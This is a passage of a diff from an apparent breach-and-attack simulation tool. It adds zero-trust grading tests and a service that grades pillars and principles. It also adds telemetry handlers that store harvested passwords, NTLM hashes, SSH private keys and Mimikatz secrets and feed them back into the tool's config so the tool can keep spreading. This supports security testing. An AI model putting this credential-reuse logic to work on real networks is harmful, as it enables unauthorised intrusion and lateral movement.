|
||||||
|
Finding.save_finding(TEST_DATA_ENDPOINT_HTTP, STATUS_VERIFY, [])
|
||||||
|
# data passed 1
|
||||||
|
Finding.save_finding(TEST_DATA_ENDPOINT_HTTP, STATUS_PASSED, [])
|
||||||
|
|
||||||
|
|
||||||
|
class TestZeroTrustService(IslandTestCase):
|
||||||
|
def test_get_pillars_grades(self):
|
||||||
|
self.fail_if_not_testing_env()
|
||||||
|
self.clean_finding_db()
|
||||||
|
|
||||||
|
save_example_findings()
|
||||||
|
|
||||||
|
expected = [
|
||||||
|
{
|
||||||
|
STATUS_FAILED: 5,
|
||||||
|
STATUS_VERIFY: 2,
|
||||||
|
STATUS_PASSED: 1,
|
||||||
|
STATUS_UNEXECUTED: 1,
|
||||||
|
"pillar": "Data"
|
||||||
|
},
|
||||||
|
{
|
||||||
|
STATUS_FAILED: 0,
|
||||||
|
STATUS_VERIFY: 2,
|
||||||
|
STATUS_PASSED: 0,
|
||||||
|
STATUS_UNEXECUTED: 1,
|
||||||
|
"pillar": "People"
|
||||||
|
},
|
||||||
|
{
|
||||||
|
STATUS_FAILED: 0,
|
||||||
|
STATUS_VERIFY: 2,
|
||||||
|
STATUS_PASSED: 0,
|
||||||
|
STATUS_UNEXECUTED: 4,
|
||||||
|
"pillar": "Networks"
|
||||||
|
},
|
||||||
|
{
|
||||||
|
STATUS_FAILED: 1,
|
||||||
|
STATUS_VERIFY: 0,
|
||||||
|
STATUS_PASSED: 2,
|
||||||
|
STATUS_UNEXECUTED: 1,
|
||||||
|
"pillar": "Devices"
|
||||||
|
},
|
||||||
|
{
|
||||||
|
STATUS_FAILED: 0,
|
||||||
|
STATUS_VERIFY: 0,
|
||||||
|
STATUS_PASSED: 0,
|
||||||
|
STATUS_UNEXECUTED: 0,
|
||||||
|
"pillar": "Workloads"
|
||||||
|
},
|
||||||
|
{
|
||||||
|
STATUS_FAILED: 0,
|
||||||
|
STATUS_VERIFY: 0,
|
||||||
|
STATUS_PASSED: 0,
|
||||||
|
STATUS_UNEXECUTED: 3,
|
||||||
|
"pillar": "Visibility & Analytics"
|
||||||
|
},
|
||||||
|
{
|
||||||
|
STATUS_FAILED: 0,
|
||||||
|
STATUS_VERIFY: 0,
|
||||||
|
STATUS_PASSED: 0,
|
||||||
|
STATUS_UNEXECUTED: 0,
|
||||||
|
"pillar": "Automation & Orchestration"
|
||||||
|
}
|
||||||
|
]
|
||||||
|
|
||||||
|
result = ZeroTrustService.get_pillars_grades()
|
||||||
|
|
||||||
|
self.assertEquals(result, expected)
|
||||||
|
|
||||||
|
def test_get_principles_status(self):
|
||||||
|
self.fail_if_not_testing_env()
|
||||||
|
self.clean_finding_db()
|
||||||
|
|
||||||
|
self.maxDiff = None
|
||||||
|
|
||||||
|
save_example_findings()
|
||||||
|
|
||||||
|
expected = {
|
||||||
|
AUTOMATION_ORCHESTRATION: [],
|
||||||
|
DATA: [
|
||||||
|
{
|
||||||
|
"principle": PRINCIPLES[PRINCIPLE_DATA_TRANSIT],
|
||||||
|
"status": STATUS_FAILED,
|
||||||
|
"tests": [
|
||||||
|
{
|
||||||
|
"status": STATUS_FAILED,
|
||||||
|
"test": TESTS_MAP[TEST_DATA_ENDPOINT_HTTP][TEST_EXPLANATION_KEY]
|
||||||
|
},
|
||||||
|
{
|
||||||
|
"status": STATUS_UNEXECUTED,
|
||||||
|
"test": TESTS_MAP[TEST_DATA_ENDPOINT_ELASTIC][TEST_EXPLANATION_KEY]
|
||||||
|
},
|
||||||
|
]
|
||||||
|
}
|
||||||
|
],
|
||||||
|
DEVICES: [
|
||||||
|
{
|
||||||
|
"principle": PRINCIPLES[PRINCIPLE_ENDPOINT_SECURITY],
|
||||||
|
"status": STATUS_FAILED,
|
||||||
|
"tests": [
|
||||||
|
{
|
||||||
|
"status": STATUS_UNEXECUTED,
|
||||||
|
"test": TESTS_MAP[TEST_MACHINE_EXPLOITED][TEST_EXPLANATION_KEY]
|
||||||
|
},
|
||||||
|
{
|
||||||
|
"status": STATUS_FAILED,
|
||||||
|
"test": TESTS_MAP[TEST_ENDPOINT_SECURITY_EXISTS][TEST_EXPLANATION_KEY]
|
||||||
|
},
|
||||||
|
]
|
||||||
|
}
|
||||||
|
],
|
||||||
|
NETWORKS: [
|
||||||
|
{
|
||||||
|
"principle": PRINCIPLES[PRINCIPLE_SEGMENTATION],
|
||||||
|
"status": STATUS_UNEXECUTED,
|
||||||
|
"tests": [
|
||||||
|
{
|
||||||
|
"status": STATUS_UNEXECUTED,
|
||||||
|
"test": TESTS_MAP[TEST_SEGMENTATION][TEST_EXPLANATION_KEY]
|
||||||
|
}
|
||||||
|
]
|
||||||
|
},
|
||||||
|
{
|
||||||
|
"principle": PRINCIPLES[PRINCIPLE_USER_BEHAVIOUR],
|
||||||
|
"status": STATUS_VERIFY,
|
||||||
|
"tests": [
|
||||||
|
{
|
||||||
|
"status": STATUS_VERIFY,
|
||||||
|
"test": TESTS_MAP[TEST_SCHEDULED_EXECUTION][TEST_EXPLANATION_KEY]
|
||||||
|
}
|
||||||
|
]
|
||||||
|
},
|
||||||
|
{
|
||||||
|
"principle": PRINCIPLES[PRINCIPLE_USERS_MAC_POLICIES],
|
||||||
|
"status": STATUS_UNEXECUTED,
|
||||||
|
"tests": [
|
||||||
|
{
|
||||||
|
"status": STATUS_UNEXECUTED,
|
||||||
|
"test": TESTS_MAP[TEST_COMMUNICATE_AS_NEW_USER][TEST_EXPLANATION_KEY]
|
||||||
|
}
|
||||||
|
]
|
||||||
|
},
|
||||||
|
{
|
||||||
|
"principle": PRINCIPLES[PRINCIPLE_ANALYZE_NETWORK_TRAFFIC],
|
||||||
|
"status": STATUS_UNEXECUTED,
|
||||||
|
"tests": [
|
||||||
|
{
|
||||||
|
"status": STATUS_UNEXECUTED,
|
||||||
|
"test": TESTS_MAP[TEST_MALICIOUS_ACTIVITY_TIMELINE][TEST_EXPLANATION_KEY]
|
||||||
|
}
|
||||||
|
]
|
||||||
|
},
|
||||||
|
{
|
||||||
|
"principle": PRINCIPLES[PRINCIPLE_RESTRICTIVE_NETWORK_POLICIES],
|
||||||
|
"status": STATUS_UNEXECUTED,
|
||||||
|
"tests": [
|
||||||
|
{
|
||||||
|
"status": STATUS_UNEXECUTED,
|
||||||
|
"test": TESTS_MAP[TEST_TUNNELING][TEST_EXPLANATION_KEY]
|
||||||
|
}
|
||||||
|
]
|
||||||
|
},
|
||||||
|
],
|
||||||
|
PEOPLE: [
|
||||||
|
{
|
||||||
|
"principle": PRINCIPLES[PRINCIPLE_USER_BEHAVIOUR],
|
||||||
|
"status": STATUS_VERIFY,
|
||||||
|
"tests": [
|
||||||
|
{
|
||||||
|
"status": STATUS_VERIFY,
|
||||||
|
"test": TESTS_MAP[TEST_SCHEDULED_EXECUTION][TEST_EXPLANATION_KEY]
|
||||||
|
}
|
||||||
|
]
|
||||||
|
},
|
||||||
|
{
|
||||||
|
"principle": PRINCIPLES[PRINCIPLE_USERS_MAC_POLICIES],
|
||||||
|
"status": STATUS_UNEXECUTED,
|
||||||
|
"tests": [
|
||||||
|
{
|
||||||
|
"status": STATUS_UNEXECUTED,
|
||||||
|
"test": TESTS_MAP[TEST_COMMUNICATE_AS_NEW_USER][TEST_EXPLANATION_KEY]
|
||||||
|
}
|
||||||
|
]
|
||||||
|
}
|
||||||
|
],
|
||||||
|
VISIBILITY_ANALYTICS: [
|
||||||
|
{
|
||||||
|
"principle": PRINCIPLES[PRINCIPLE_USERS_MAC_POLICIES],
|
||||||
|
"status": STATUS_UNEXECUTED,
|
||||||
|
"tests": [
|
||||||
|
{
|
||||||
|
"status": STATUS_UNEXECUTED,
|
||||||
|
"test": TESTS_MAP[TEST_COMMUNICATE_AS_NEW_USER][TEST_EXPLANATION_KEY]
|
||||||
|
}
|
||||||
|
]
|
||||||
|
},
|
||||||
|
{
|
||||||
|
"principle": PRINCIPLES[PRINCIPLE_ANALYZE_NETWORK_TRAFFIC],
|
||||||
|
"status": STATUS_UNEXECUTED,
|
||||||
|
"tests": [
|
||||||
|
{
|
||||||
|
"status": STATUS_UNEXECUTED,
|
||||||
|
"test": TESTS_MAP[TEST_MALICIOUS_ACTIVITY_TIMELINE][TEST_EXPLANATION_KEY]
|
||||||
|
}
|
||||||
|
]
|
||||||
|
},
|
||||||
|
{
|
||||||
|
"principle": PRINCIPLES[PRINCIPLE_RESTRICTIVE_NETWORK_POLICIES],
|
||||||
|
"status": STATUS_UNEXECUTED,
|
||||||
|
"tests": [
|
||||||
|
{
|
||||||
|
"status": STATUS_UNEXECUTED,
|
||||||
|
"test": TESTS_MAP[TEST_TUNNELING][TEST_EXPLANATION_KEY]
|
||||||
|
}
|
||||||
|
]
|
||||||
|
},
|
||||||
|
],
|
||||||
|
WORKLOADS: []
|
||||||
|
}
|
||||||
|
|
||||||
|
result = ZeroTrustService.get_principles_status()
|
||||||
|
self.assertEquals(result, expected)
|
||||||
|
|
||||||
|
def test_get_pillars_to_statuses(self):
|
||||||
|
self.fail_if_not_testing_env()
|
||||||
|
self.clean_finding_db()
|
||||||
|
|
||||||
|
self.maxDiff = None
|
||||||
|
|
||||||
|
expected = {
|
||||||
|
AUTOMATION_ORCHESTRATION: STATUS_UNEXECUTED,
|
||||||
|
DEVICES: STATUS_UNEXECUTED,
|
||||||
|
NETWORKS: STATUS_UNEXECUTED,
|
||||||
|
PEOPLE: STATUS_UNEXECUTED,
|
||||||
|
VISIBILITY_ANALYTICS: STATUS_UNEXECUTED,
|
||||||
|
WORKLOADS: STATUS_UNEXECUTED,
|
||||||
|
DATA: STATUS_UNEXECUTED
|
||||||
|
}
|
||||||
|
|
||||||
|
self.assertEquals(ZeroTrustService.get_pillars_to_statuses(), expected)
|
||||||
|
|
||||||
|
save_example_findings()
|
||||||
|
|
||||||
|
expected = {
|
||||||
|
AUTOMATION_ORCHESTRATION: STATUS_UNEXECUTED,
|
||||||
|
DEVICES: STATUS_FAILED,
|
||||||
|
NETWORKS: STATUS_VERIFY,
|
||||||
|
PEOPLE: STATUS_VERIFY,
|
||||||
|
VISIBILITY_ANALYTICS: STATUS_UNEXECUTED,
|
||||||
|
WORKLOADS: STATUS_UNEXECUTED,
|
||||||
|
DATA: STATUS_FAILED
|
||||||
|
}
|
||||||
|
|
||||||
|
self.assertEquals(ZeroTrustService.get_pillars_to_statuses(), expected)
|
|
@ -0,0 +1,150 @@
|
||||||
|
import json
|
||||||
|
from common.data.zero_trust_consts import *
|
||||||
|
from monkey_island.cc.models.zero_trust.finding import Finding
|
||||||
|
|
||||||
|
|
||||||
|
class ZeroTrustService(object):
|
||||||
|
@staticmethod
|
||||||
|
def get_pillars_grades():
|
||||||
|
pillars_grades = []
|
||||||
|
for pillar in PILLARS:
|
||||||
|
pillars_grades.append(ZeroTrustService.__get_pillar_grade(pillar))
|
||||||
|
return pillars_grades
|
||||||
|
|
||||||
|
@staticmethod
|
||||||
|
def __get_pillar_grade(pillar):
|
||||||
|
all_findings = Finding.objects()
|
||||||
|
pillar_grade = {
|
||||||
|
"pillar": pillar,
|
||||||
|
STATUS_FAILED: 0,
|
||||||
|
STATUS_VERIFY: 0,
|
||||||
|
STATUS_PASSED: 0,
|
||||||
|
STATUS_UNEXECUTED: 0
|
||||||
|
}
|
||||||
|
|
||||||
|
tests_of_this_pillar = PILLARS_TO_TESTS[pillar]
|
||||||
|
|
||||||
|
test_unexecuted = {}
|
||||||
|
for test in tests_of_this_pillar:
|
||||||
|
test_unexecuted[test] = True
|
||||||
|
|
||||||
|
for finding in all_findings:
|
||||||
|
test_unexecuted[finding.test] = False
|
||||||
|
test_info = TESTS_MAP[finding.test]
|
||||||
|
if pillar in test_info[PILLARS_KEY]:
|
||||||
|
pillar_grade[finding.status] += 1
|
||||||
|
|
||||||
|
pillar_grade[STATUS_UNEXECUTED] = sum(1 for condition in test_unexecuted.values() if condition)
|
||||||
|
|
||||||
|
return pillar_grade
|
||||||
|
|
||||||
|
@staticmethod
|
||||||
|
def get_principles_status():
|
||||||
|
all_principles_statuses = {}
|
||||||
|
|
||||||
|
# init with empty lists
|
||||||
|
for pillar in PILLARS:
|
||||||
|
all_principles_statuses[pillar] = []
|
||||||
|
|
||||||
|
for principle, principle_tests in PRINCIPLES_TO_TESTS.items():
|
||||||
|
for pillar in PRINCIPLES_TO_PILLARS[principle]:
|
||||||
|
all_principles_statuses[pillar].append(
|
||||||
|
{
|
||||||
|
"principle": PRINCIPLES[principle],
|
||||||
|
"tests": ZeroTrustService.__get_tests_status(principle_tests),
|
||||||
|
"status": ZeroTrustService.__get_principle_status(principle_tests)
|
||||||
|
}
|
||||||
|
)
|
||||||
|
|
||||||
|
return all_principles_statuses
|
||||||
|
|
||||||
|
@staticmethod
|
||||||
|
def __get_principle_status(principle_tests):
|
||||||
|
worst_status = STATUS_UNEXECUTED
|
||||||
|
all_statuses = set()
|
||||||
|
for test in principle_tests:
|
||||||
|
all_statuses |= set(Finding.objects(test=test).distinct("status"))
|
||||||
|
|
||||||
|
for status in all_statuses:
|
||||||
|
if ORDERED_TEST_STATUSES.index(status) < ORDERED_TEST_STATUSES.index(worst_status):
|
||||||
|
worst_status = status
|
||||||
|
|
||||||
|
return worst_status
|
||||||
|
|
||||||
|
@staticmethod
|
||||||
|
def __get_tests_status(principle_tests):
|
||||||
|
results = []
|
||||||
|
for test in principle_tests:
|
||||||
|
test_findings = Finding.objects(test=test)
|
||||||
|
results.append(
|
||||||
|
{
|
||||||
|
"test": TESTS_MAP[test][TEST_EXPLANATION_KEY],
|
||||||
|
"status": ZeroTrustService.__get_lcd_worst_status_for_test(test_findings)
|
||||||
|
}
|
||||||
|
)
|
||||||
|
return results
|
||||||
|
|
||||||
|
@staticmethod
|
||||||
|
def __get_lcd_worst_status_for_test(all_findings_for_test):
|
||||||
|
"""
|
||||||
|
:param all_findings_for_test: All findings of a specific test (get this using Finding.objects(test={A_TEST}))
|
||||||
|
:return: the "worst" (i.e. most severe) status out of the given findings.
|
||||||
|
lcd stands for lowest common denominator.
|
||||||
|
"""
|
||||||
|
current_worst_status = STATUS_UNEXECUTED
|
||||||
|
for finding in all_findings_for_test:
|
||||||
|
if ORDERED_TEST_STATUSES.index(finding.status) < ORDERED_TEST_STATUSES.index(current_worst_status):
|
||||||
|
current_worst_status = finding.status
|
||||||
|
|
||||||
|
return current_worst_status
|
||||||
|
|
||||||
|
@staticmethod
|
||||||
|
def get_all_findings():
|
||||||
|
all_findings = Finding.objects()
|
||||||
|
enriched_findings = [ZeroTrustService.__get_enriched_finding(f) for f in all_findings]
|
||||||
|
return enriched_findings
|
||||||
|
|
||||||
|
@staticmethod
|
||||||
|
def __get_enriched_finding(finding):
|
||||||
|
test_info = TESTS_MAP[finding.test]
|
||||||
|
enriched_finding = {
|
||||||
|
"test": test_info[FINDING_EXPLANATION_BY_STATUS_KEY][finding.status],
|
||||||
|
"test_key": finding.test,
|
||||||
|
"pillars": test_info[PILLARS_KEY],
|
||||||
|
"status": finding.status,
|
||||||
|
"events": ZeroTrustService.__get_events_as_dict(finding.events)
|
||||||
|
}
|
||||||
|
return enriched_finding
|
||||||
|
|
||||||
|
@staticmethod
|
||||||
|
def __get_events_as_dict(events):
|
||||||
|
return [json.loads(event.to_json()) for event in events]
|
||||||
|
|
||||||
|
@staticmethod
|
||||||
|
def get_statuses_to_pillars():
|
||||||
|
results = {
|
||||||
|
STATUS_FAILED: [],
|
||||||
|
STATUS_VERIFY: [],
|
||||||
|
STATUS_PASSED: [],
|
||||||
|
STATUS_UNEXECUTED: []
|
||||||
|
}
|
||||||
|
for pillar in PILLARS:
|
||||||
|
results[ZeroTrustService.__get_status_of_single_pillar(pillar)].append(pillar)
|
||||||
|
|
||||||
|
return results
|
||||||
|
|
||||||
|
@staticmethod
|
||||||
|
def get_pillars_to_statuses():
|
||||||
|
results = {}
|
||||||
|
for pillar in PILLARS:
|
||||||
|
results[pillar] = ZeroTrustService.__get_status_of_single_pillar(pillar)
|
||||||
|
|
||||||
|
return results
|
||||||
|
|
||||||
|
@staticmethod
|
||||||
|
def __get_status_of_single_pillar(pillar):
|
||||||
|
grade = ZeroTrustService.__get_pillar_grade(pillar)
|
||||||
|
for status in ORDERED_TEST_STATUSES:
|
||||||
|
if grade[status] > 0:
|
||||||
|
return status
|
||||||
|
return STATUS_UNEXECUTED
|
|
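Not part of the diff: a small sketch of the "worst status wins" rule used by __get_principle_status and __get_lcd_worst_status_for_test above, assuming it runs inside the Monkey Island source tree so the constants can be imported:

from common.data.zero_trust_consts import ORDERED_TEST_STATUSES, STATUS_UNEXECUTED, STATUS_VERIFY, STATUS_PASSED


def worst_status(statuses):
    # A lower index in ORDERED_TEST_STATUSES is more severe, so keep the lowest index seen.
    current = STATUS_UNEXECUTED
    for status in statuses:
        if ORDERED_TEST_STATUSES.index(status) < ORDERED_TEST_STATUSES.index(current):
            current = status
    return current


print(worst_status([STATUS_PASSED, STATUS_VERIFY]))  # the more severe of the two
print(worst_status([]))                              # no findings at all falls back to STATUS_UNEXECUTED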
@@ -0,0 +1,7 @@
# import all implemented hooks, for brevity of hooks.py file
from tunnel import process_tunnel_telemetry
from state import process_state_telemetry
from exploit import process_exploit_telemetry
from scan import process_scan_telemetry
from system_info import process_system_info_telemetry
from post_breach import process_post_breach_telemetry
@@ -0,0 +1,58 @@
import copy

import dateutil

from monkey_island.cc.database import mongo
from monkey_island.cc.encryptor import encryptor
from monkey_island.cc.models import Monkey
from monkey_island.cc.services.edge import EdgeService
from monkey_island.cc.services.node import NodeService
from monkey_island.cc.services.telemetry.processing.utils import get_edge_by_scan_or_exploit_telemetry
from monkey_island.cc.services.telemetry.zero_trust_tests.machine_exploited import test_machine_exploited


def process_exploit_telemetry(telemetry_json):
    encrypt_exploit_creds(telemetry_json)
    edge = get_edge_by_scan_or_exploit_telemetry(telemetry_json)
    update_edge_info_with_new_exploit(edge, telemetry_json)
    update_node_credentials_from_successful_attempts(edge, telemetry_json)

    test_machine_exploited(
        current_monkey=Monkey.get_single_monkey_by_guid(telemetry_json['monkey_guid']),
        exploit_successful=telemetry_json['data']['result'],
        exploiter=telemetry_json['data']['exploiter'],
        target_ip=telemetry_json['data']['machine']['ip_addr'],
        timestamp=telemetry_json['timestamp'])


def update_node_credentials_from_successful_attempts(edge, telemetry_json):
    for attempt in telemetry_json['data']['attempts']:
        if attempt['result']:
            found_creds = {'user': attempt['user']}
            for field in ['password', 'lm_hash', 'ntlm_hash', 'ssh_key']:
                if len(attempt[field]) != 0:
                    found_creds[field] = attempt[field]
            NodeService.add_credentials_to_node(edge['to'], found_creds)


def update_edge_info_with_new_exploit(edge, telemetry_json):
    telemetry_json['data']['info']['started'] = dateutil.parser.parse(telemetry_json['data']['info']['started'])
    telemetry_json['data']['info']['finished'] = dateutil.parser.parse(telemetry_json['data']['info']['finished'])
    new_exploit = copy.deepcopy(telemetry_json['data'])
    new_exploit.pop('machine')
    new_exploit['timestamp'] = telemetry_json['timestamp']
    mongo.db.edge.update(
        {'_id': edge['_id']},
        {'$push': {'exploits': new_exploit}}
    )
    if new_exploit['result']:
        EdgeService.set_edge_exploited(edge)


def encrypt_exploit_creds(telemetry_json):
    attempts = telemetry_json['data']['attempts']
    for i in range(len(attempts)):
        for field in ['password', 'lm_hash', 'ntlm_hash']:
            credential = attempts[i][field]
            if len(credential) > 0:
                attempts[i][field] = encryptor.enc(credential.encode('utf-8'))
@@ -0,0 +1,27 @@
from monkey_island.cc.database import mongo
from common.data.post_breach_consts import *
from monkey_island.cc.models import Monkey
from monkey_island.cc.services.telemetry.zero_trust_tests.communicate_as_new_user import test_new_user_communication


def process_communicate_as_new_user_telemetry(telemetry_json):
    current_monkey = Monkey.get_single_monkey_by_guid(telemetry_json['monkey_guid'])
    message = telemetry_json['data']['result'][0]
    success = telemetry_json['data']['result'][1]
    test_new_user_communication(current_monkey, success, message)


POST_BREACH_TELEMETRY_PROCESSING_FUNCS = {
    POST_BREACH_COMMUNICATE_AS_NEW_USER: process_communicate_as_new_user_telemetry,
}


def process_post_breach_telemetry(telemetry_json):
    mongo.db.monkey.update(
        {'guid': telemetry_json['monkey_guid']},
        {'$push': {'pba_results': telemetry_json['data']}})

    post_breach_action_name = telemetry_json["data"]["name"]
    if post_breach_action_name in POST_BREACH_TELEMETRY_PROCESSING_FUNCS:
        POST_BREACH_TELEMETRY_PROCESSING_FUNCS[post_breach_action_name](telemetry_json)
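Not part of the diff: a hedged sketch of the telemetry shape this dispatcher expects, using a stand-in dispatch table and made-up values so it runs without the Island services; in the real module the keys are the post-breach action name constants.

POST_BREACH_TELEMETRY_PROCESSING_FUNCS = {'some PBA name': lambda telemetry_json: None}  # stand-in table

example_post_breach_telemetry = {
    'monkey_guid': '1234',  # hypothetical GUID
    'data': {
        'name': 'some PBA name',  # must equal one of the dispatch dict's keys
        'result': ['raw command output...', False],  # [message, success], as unpacked by the handler above
    },
}

name = example_post_breach_telemetry['data']['name']
if name in POST_BREACH_TELEMETRY_PROCESSING_FUNCS:
    POST_BREACH_TELEMETRY_PROCESSING_FUNCS[name](example_post_breach_telemetry)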
@@ -0,0 +1,29 @@
import logging

from monkey_island.cc.services.telemetry.processing import *

logger = logging.getLogger(__name__)

TELEMETRY_CATEGORY_TO_PROCESSING_FUNC = \
    {
        'tunnel': process_tunnel_telemetry,
        'state': process_state_telemetry,
        'exploit': process_exploit_telemetry,
        'scan': process_scan_telemetry,
        'system_info': process_system_info_telemetry,
        'post_breach': process_post_breach_telemetry,
        # `lambda *args, **kwargs: None` is a no-op.
        'trace': lambda *args, **kwargs: None,
        'attack': lambda *args, **kwargs: None,
    }


def process_telemetry(telemetry_json):
    try:
        telem_category = telemetry_json.get('telem_category')
        if telem_category in TELEMETRY_CATEGORY_TO_PROCESSING_FUNC:
            TELEMETRY_CATEGORY_TO_PROCESSING_FUNC[telem_category](telemetry_json)
        else:
            logger.info('Got unknown type of telemetry: %s' % telem_category)
    except Exception as ex:
        logger.error("Exception caught while processing telemetry. Info: {}".format(ex.message), exc_info=True)
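Not part of the diff: a minimal, self-contained sketch of how the category dispatch above degrades gracefully, using a stand-in table with only the no-op handlers so it runs outside the Island:

import logging

logging.basicConfig(level=logging.INFO)
logger = logging.getLogger(__name__)

# Stand-in for TELEMETRY_CATEGORY_TO_PROCESSING_FUNC.
PROCESSORS = {
    'trace': lambda *args, **kwargs: None,
    'attack': lambda *args, **kwargs: None,
}


def process_telemetry(telemetry_json):
    telem_category = telemetry_json.get('telem_category')
    if telem_category in PROCESSORS:
        PROCESSORS[telem_category](telemetry_json)  # known category, handled (here: ignored)
    else:
        logger.info('Got unknown type of telemetry: %s' % telem_category)


process_telemetry({'telem_category': 'trace'})  # silently handled by the no-op
process_telemetry({'telem_category': 'bogus'})  # logged as unknown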
@@ -0,0 +1,44 @@
import copy

from monkey_island.cc.database import mongo
from monkey_island.cc.models import Monkey
from monkey_island.cc.services.telemetry.processing.utils import get_edge_by_scan_or_exploit_telemetry
from monkey_island.cc.services.telemetry.zero_trust_tests.data_endpoints import test_open_data_endpoints
from monkey_island.cc.services.telemetry.zero_trust_tests.segmentation import test_segmentation_violation


def process_scan_telemetry(telemetry_json):
    update_edges_and_nodes_based_on_scan_telemetry(telemetry_json)
    test_open_data_endpoints(telemetry_json)

    current_monkey = Monkey.get_single_monkey_by_guid(telemetry_json['monkey_guid'])
    target_ip = telemetry_json['data']['machine']['ip_addr']
    test_segmentation_violation(current_monkey, target_ip)


def update_edges_and_nodes_based_on_scan_telemetry(telemetry_json):
    edge = get_edge_by_scan_or_exploit_telemetry(telemetry_json)
    data = copy.deepcopy(telemetry_json['data']['machine'])
    ip_address = data.pop("ip_addr")
    domain_name = data.pop("domain_name")
    new_scan = \
        {
            "timestamp": telemetry_json["timestamp"],
            "data": data
        }
    mongo.db.edge.update(
        {"_id": edge["_id"]},
        {"$push": {"scans": new_scan},
         "$set": {"ip_address": ip_address, 'domain_name': domain_name}}
    )
    node = mongo.db.node.find_one({"_id": edge["to"]})
    if node is not None:
        scan_os = new_scan["data"]["os"]
        if "type" in scan_os:
            mongo.db.node.update({"_id": node["_id"]},
                                 {"$set": {"os.type": scan_os["type"]}},
                                 upsert=False)
        if "version" in scan_os:
            mongo.db.node.update({"_id": node["_id"]},
                                 {"$set": {"os.version": scan_os["version"]}},
                                 upsert=False)
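Not part of the diff: a standalone sketch of the scan-document reshaping above, with a made-up telemetry dict; 'ip_addr' and 'domain_name' are popped out of the machine data and stored on the edge itself, while the rest travels inside the pushed scan entry.

import copy

telemetry_json = {
    "timestamp": "2019-08-01T12:00:00",  # hypothetical values throughout
    "data": {"machine": {"ip_addr": "10.0.0.7", "domain_name": "victim.local",
                         "os": {"type": "linux"}, "services": {}}},
}

data = copy.deepcopy(telemetry_json['data']['machine'])
ip_address = data.pop("ip_addr")
domain_name = data.pop("domain_name")
new_scan = {"timestamp": telemetry_json["timestamp"], "data": data}
print(ip_address, domain_name, new_scan)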
@@ -0,0 +1,17 @@
from monkey_island.cc.models import Monkey
from monkey_island.cc.services.node import NodeService
from monkey_island.cc.services.telemetry.zero_trust_tests.segmentation import \
    test_passed_findings_for_unreached_segments


def process_state_telemetry(telemetry_json):
    monkey = NodeService.get_monkey_by_guid(telemetry_json['monkey_guid'])
    NodeService.add_communication_info(monkey, telemetry_json['command_control_channel'])
    if telemetry_json['data']['done']:
        NodeService.set_monkey_dead(monkey, True)
    else:
        NodeService.set_monkey_dead(monkey, False)

    if telemetry_json['data']['done']:
        current_monkey = Monkey.get_single_monkey_by_guid(telemetry_json['monkey_guid'])
        test_passed_findings_for_unreached_segments(current_monkey)
@ -0,0 +1,99 @@
|
||||||
|
from monkey_island.cc.database import mongo
|
||||||
|
from monkey_island.cc.services import mimikatz_utils
|
||||||
|
from monkey_island.cc.services.node import NodeService
|
||||||
|
from monkey_island.cc.services.config import ConfigService
|
||||||
|
from monkey_island.cc.services.telemetry.zero_trust_tests.antivirus_existence import test_antivirus_existence
|
||||||
|
from monkey_island.cc.services.wmi_handler import WMIHandler
|
||||||
|
from monkey_island.cc.encryptor import encryptor
|
||||||
|
|
||||||
|
|
||||||
|
def process_system_info_telemetry(telemetry_json):
|
||||||
|
process_ssh_info(telemetry_json)
|
||||||
|
process_credential_info(telemetry_json)
|
||||||
|
process_mimikatz_and_wmi_info(telemetry_json)
|
||||||
|
process_aws_data(telemetry_json)
|
||||||
|
test_antivirus_existence(telemetry_json)
|
||||||
|
|
||||||
|
|
||||||
|
def process_ssh_info(telemetry_json):
|
||||||
|
if 'ssh_info' in telemetry_json['data']:
|
||||||
|
ssh_info = telemetry_json['data']['ssh_info']
|
||||||
|
encrypt_system_info_ssh_keys(ssh_info)
|
||||||
|
if telemetry_json['data']['network_info']['networks']:
|
||||||
|
# We use user_name@machine_ip as the name of the ssh key stolen, thats why we need ip from telemetry
|
||||||
|
add_ip_to_ssh_keys(telemetry_json['data']['network_info']['networks'][0], ssh_info)
|
||||||
|
add_system_info_ssh_keys_to_config(ssh_info)
|
||||||
|
|
||||||
|
|
||||||
|
def add_system_info_ssh_keys_to_config(ssh_info):
|
||||||
|
for user in ssh_info:
|
||||||
|
ConfigService.creds_add_username(user['name'])
|
||||||
|
# Public key is useless without private key
|
||||||
|
if user['public_key'] and user['private_key']:
|
||||||
|
ConfigService.ssh_add_keys(user['public_key'], user['private_key'],
|
||||||
|
user['name'], user['ip'])
|
||||||
|
|
||||||
|
|
||||||
|
def add_ip_to_ssh_keys(ip, ssh_info):
|
||||||
|
for key in ssh_info:
|
||||||
|
key['ip'] = ip['addr']
|
||||||
|
|
||||||
|
|
||||||
|
def encrypt_system_info_ssh_keys(ssh_info):
|
||||||
|
for idx, user in enumerate(ssh_info):
|
||||||
|
for field in ['public_key', 'private_key', 'known_hosts']:
|
||||||
|
if ssh_info[idx][field]:
|
||||||
|
ssh_info[idx][field] = encryptor.enc(ssh_info[idx][field].encode('utf-8'))
|
||||||
|
|
||||||
|
|
||||||
|
def process_credential_info(telemetry_json):
|
||||||
|
if 'credentials' in telemetry_json['data']:
|
||||||
|
creds = telemetry_json['data']['credentials']
|
||||||
|
encrypt_system_info_creds(creds)
|
||||||
|
add_system_info_creds_to_config(creds)
|
||||||
|
replace_user_dot_with_comma(creds)
|
||||||
|
|
||||||
|
|
||||||
|
def replace_user_dot_with_comma(creds):
|
||||||
|
for user in creds:
|
||||||
|
if -1 != user.find('.'):
|
||||||
|
new_user = user.replace('.', ',')
|
||||||
|
creds[new_user] = creds.pop(user)
|
||||||
|
|
||||||
|
|
||||||
|
def add_system_info_creds_to_config(creds):
|
||||||
|
for user in creds:
|
||||||
|
ConfigService.creds_add_username(user)
|
||||||
|
if 'password' in creds[user]:
|
||||||
|
ConfigService.creds_add_password(creds[user]['password'])
|
||||||
|
if 'lm_hash' in creds[user]:
|
||||||
|
ConfigService.creds_add_lm_hash(creds[user]['lm_hash'])
|
||||||
|
if 'ntlm_hash' in creds[user]:
|
||||||
|
ConfigService.creds_add_ntlm_hash(creds[user]['ntlm_hash'])
|
||||||
|
|
||||||
|
|
||||||
|
def encrypt_system_info_creds(creds):
|
||||||
|
for user in creds:
|
||||||
|
for field in ['password', 'lm_hash', 'ntlm_hash']:
|
||||||
|
if field in creds[user]:
|
||||||
|
# this encoding is because we might run into passwords which are not pure ASCII
|
||||||
|
creds[user][field] = encryptor.enc(creds[user][field].encode('utf-8'))
|
||||||
|
|
||||||
|
|
||||||
|
def process_mimikatz_and_wmi_info(telemetry_json):
|
||||||
|
users_secrets = {}
|
||||||
|
if 'mimikatz' in telemetry_json['data']:
|
||||||
|
users_secrets = mimikatz_utils.MimikatzSecrets. \
|
||||||
|
extract_secrets_from_mimikatz(telemetry_json['data'].get('mimikatz', ''))
|
||||||
|
